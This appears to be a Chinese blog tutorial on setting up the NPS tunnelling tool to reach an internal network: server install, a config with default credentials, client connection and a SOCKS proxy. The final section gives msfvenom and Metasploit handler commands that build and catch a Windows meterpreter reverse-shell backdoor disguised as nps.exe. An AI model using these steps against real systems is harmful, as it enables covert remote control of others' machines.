【内网安全-隧道搭建】内网穿透_Nps配置、上线

简介: 【内网安全-隧道搭建】内网穿透_Nps配置、上线

Nps(自定义上线)


1、简述:


1)nps:是一款轻量级、高性能、功能强大的内网穿透代理服务器


2)功能:目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。


3)优点:与Frp类似,但是具有图形化管理界面,更方便配置


4)工具:


client代表客户端:放到内网主机


server代表服务端:放到公网服务器上


(根据内网主机下载)


Releases · ehang-io/nps (github.com)

https://github.com/ehang-io/nps/releases/


9c7c913055bb479bba42702fabbc91b5.png

注:


错误情况


需要登陆GitHub后,才能下载


如果下载过慢,使用加速器,然后上传到服务器


(有白嫖的加速器)


684e2f30fb8942a1b6576ba1dbfda3b9.png


2、工具的配置:


1、准备:


1)公网服务器


2)内网主机


3)工具下载


如果不知道自己虚拟机是何种框架的


直接在虚拟机设置中查看CD/DVD名称(在名称未改情况下)


4)实验环境


内网Linux-amd-64


服务器centos7


(所以我服务器、客户端就都下的Linux-amd-64)


5d6efdb6d912426a88dd01aeac83ce4b.png


873643b2555a4490bcb9b70f952150ce.png


登陆GitHub+加速器


下载完成

6e51f742dca845f6a009cf08d3367b6f.png


2、服务端配置:


1)上传服务端文件到服务器


ea241042f2d64b49a0de01c22eaee0e3.png


我是解压之后上传的


选中文件,右键传输


c242bc95d6584939871ef0b1b0a8ca83.png


2)安装Nps


进入到文件夹(使用Xshell)


cd /linux_amd64_server

17c6acec70174e279aa35a5bf67b2480.png


先给nps权限
sudo chmod 777 nps
(不然会报错:被拒绝)


./nps install     #linux
nps.exe install   #windows


eddda7ec84ca4d1e8ad74d5c7d9415a4.png

3)修改配置文件


conf--->nps.conf

e7d05363f10946ec9988a83f19126f62.png


vim nps.conf

f0f52307a1b749fdb463b430252bd2b4.png


修改的地方:


web的host、账号、密码和端口号


注意:


修改域名代理的端口,避免端口冲突


NPS的web页面默认端口8080,默认账号密码:admin/123


NPS的服务端和客户端进行连接的默认端口是8024(可修改,连接时使用修改后的端口)


NPS服务端开启的端口(即需要访问的VPS的端口)不在配置文件中,在web界面中进行配置


按i进行编辑
(Linux知识点)


appname = nps
#HTTP(S) proxy port, no startup if empty
http_proxy_ip=0.0.0.0
http_proxy_port=80          #域名代理http代理监听端口(修改端口,避免冲突)
https_proxy_port=443        #域名代理https代理监听端口(修改端口,避免冲突)
https_just_proxy=true
#default https certificate setting
https_default_cert_file=conf/server.pem
https_default_key_file=conf/server.key
##bridge
bridge_type=tcp            #客户端与服务端连接的协议
bridge_port=8024           #服务端客户端通信端口(即客户端访问服务端的端口)
bridge_ip=0.0.0.0
# Public password, which clients can use to connect to the server
public_vkey=123        #客户端以配置文件模式启动时的密钥,设置为空表示关闭客户端配置文件连接模式
#Traffic data persistence interval(minute)
#Ignorance means no persistence
#flow_store_interval=1
log_level=7                 #日志输出级别
#log_path=nps.log
#Whether to restrict IP access, true or false or ignore
#ip_limit=true              #是否限制ip访问,true或false或忽略
#p2p
#p2p_ip=127.0.0.1           #服务端IP,使用p2p模式必填
#p2p_port=6000              #p2p模式开启的udp端口
#web
web_host=a.o.com            #需要修改,改为服务器ip
web_username=admin          #web界面管理账号(可修改)
web_password=123            #web界面管理密码(可修改)
web_port = 8080             #web管理端口,访问该端口可以访问NPS后台(可修改)
web_ip=0.0.0.0
web_base_url=               #web管理主路径,用于将web管理置于代理子路径后面
web_open_ssl=false
web_cert_file=conf/server.pem
web_key_file=conf/server.key
# if web under proxy use sub path. like http://host/nps need this.
#web_base_url=/nps
#Web API unauthenticated IP address(the len of auth_crypt_key must be 16)
#Remove comments if needed
#auth_key=test                          #web api密钥
auth_crypt_key =1234567812345678        #获取服务端authKey时的aes加密密钥,16位
#allow_ports=9001-9009,10001,11000-12000
#Web management multi-user login
allow_user_login=false
allow_user_register=false
allow_user_change_username=false
#extension
allow_flow_limit=false
allow_rate_limit=false
allow_tunnel_num_limit=false
allow_local_proxy=false
allow_connection_num_limit=false
allow_multi_ip=false
system_info_display=false
#cache
http_cache=false
http_cache_length=100
#get origin ip
http_add_origin_header=false
#pprof debug options
#pprof_ip=0.0.0.0               #debug pprof 服务端IP
#pprof_port=9999                #debug pprof 端口
#client disconnect timeout
disconnect_timeout=60            #客户端连接超时,单位5s,默认值60(5mins)

改完以后


按Esc


再输入:wq+回车

4ae88596a0914b0b983c86ee11fd7ed3.png



4)启动Nps:


nps start

cc81a9dffc204be0a3523888d4bfbd51.png


注意:


问题一:


当启动连接失败的时候


输入:
nps
(会有报错信息)


c627d2f3bae349e4ad07ed1994165ab5.png


8024端口被使用了,换一个端口,再重载配置文件,再启动


重载配置文件
./nps reload

失败了

260b0eff1ea748d6b56bccacc6a0036b.png


问题二:


在客户端发现连接不上,应该是防火墙问题了


81aa46fc5cc44f92b43eec3bb58afc82.png


5)后台管理界面可以启动


输入ip:port


94c806592cc34599923929883d2e069b.png


3、客户端配置


1)下贼合适内网主机版本的


我直接复制、粘贴到内网主机了


0babb1a8bca544fda33f6b771790baeb.png


2)端口是否能连接


Linux:./npc -server=ip:port -vkey=服务端的验证密钥
Windows:npc.exe -server=ip:port -vkey=服务端的验证密钥


客户端并还没有生成,这里测试端口是否能连接上


8024端口可以连通,没拒绝访问


(注:客户端未生成,服务端的验证密钥也是没有的)


ecd631c861b5475d9881582b773d100a.png


拒绝就查看配置文件是否设置的一致,服务器端口是否打开


3)修改配置文件


如果修改过,主要是这3个修改

65ec4ba03f884c69a83a5d9e453748db.png


3、工具的使用:


1、web管理界面


1)登陆nps后台


账号密码admin/123


(如果修改了的,使用自己修改的登陆)


换为中文,嘿嘿嘿


73738360a8894dc9bebda5523c7daab6.png


2)新建一个客户端


会生成唯一验证密钥,通过密钥将NPS的服务端和客户端连接起来


896f2c8846154675a3fe7edc6f3fd8eb.png


得到ID、唯一验证密钥

7628e3551a734c779b5d728a51e138b6.png

3)新增SOCKS代理


填上id、端口


服务端端口8024不能填,因为8024是连接客户端与服务端


我们需要重新写一个端口,访问服务端的这个端口,从而访问到内网

aaf77fc63d954796b7c3a75366c2d34c.png


2、客户端上线


1)连接服务端,上线


Linux:./npc -server=ip:port -vkey=后台服务端生成的验证密钥
Windows:npc.exe -server=ip:port -vkey=后台服务端生成的验证密钥

2b8c0c1467fd47558e37d6f545b0c7fd.png


再次查看服务端后台


已经上线了,实验基本上完成了

16c4fd69b0dd4aa5a133c5be50df4dcf.png


2)访问内网主机


使用浏览器设置代理,然后访问内网主机


3、msf后门


生成后门:


msfvenom -p windows/meterpreter/reverse_tcp lhost=…… lport=3333 -f exe -o nps.exe


(注意是生成win、还是Linux的监听器)

(注:lhos:服务器ip、lport:服务器端口)


监听后门:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
run
(注意是win、还是Linux的监听器)


(注:这个监听端口lport,与本地转发端口一致)

目录
相关文章
|
6月前
|
关系型数据库 MySQL PHP
【无公网IP】安装Wnmp并结合内网穿透,实现灵活可靠的外网访问内网服务!
【无公网IP】安装Wnmp并结合内网穿透,实现灵活可靠的外网访问内网服务!
|
12天前
|
安全 文件存储 数据安全/隐私保护
贝锐花生壳全新客户端上线:远程威联通NAS,无需公网IP、简单3步!
为了实现随时随地访问和备份珍贵数据,贝锐花生壳推出专为威联通NAS设计的内网穿透方案。用户只需通过威联通NAS应用中心一键安装,即可享受无需公网IP的远程访问便利。此外,贝锐花生壳还提供自动部署HTTPS证书和访问控制功能,确保数据传输的安全性。群晖NAS用户同样可以通过套件中心一键安装使用。
35 0
贝锐花生壳全新客户端上线:远程威联通NAS,无需公网IP、简单3步!
|
19天前
|
Linux 文件存储 开发工具
贝锐花生壳内网穿透:无需公网IP,远程访问自建WebDAV文件共享!
WebDAV共享协议支持几乎所有系统和设备,极大方便了文件共享。群晖NAS等设备可通过安装WebDAV套件实现文件共享,结合花生壳内网穿透服务,只需三步即可实现远程访问。具体步骤包括:1. 安装花生壳客户端;2. 登录并配置映射;3. 创建映射,生成远程访问地址。这样,用户可以随时随地访问和管理文件资源。
39 3
|
6月前
|
网络协议 安全 测试技术
公网环境固定域名异地远程访问内网BUG管理系统
公网环境固定域名异地远程访问内网BUG管理系统
51 1
|
6月前
|
网络协议 安全 测试技术
Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
|
6月前
如何用cpolar创建隧道,实现外网访问内网?
如何用cpolar创建隧道,实现外网访问内网?
109 0
|
6月前
|
网络协议 安全 测试技术
如何在公网环境使用固定域名远程访问内网BUG管理系统协同办公
如何在公网环境使用固定域名远程访问内网BUG管理系统协同办公
|
网络协议 安全 测试技术
实现远程访问内网BUG管理系统的方法:使用Cpolar内网穿透技术
实现远程访问内网BUG管理系统的方法:使用Cpolar内网穿透技术
|
Ubuntu 网络协议 Linux
内网隧道搭建总结(一)(上)
内网隧道搭建总结(一)
333 1
内网隧道搭建总结(一)(上)
|
网络协议 安全 应用服务中间件
【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)
【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)
557 0
【内网安全-隧道搭建】内网穿透_Ngrok上线(美版、国版二开)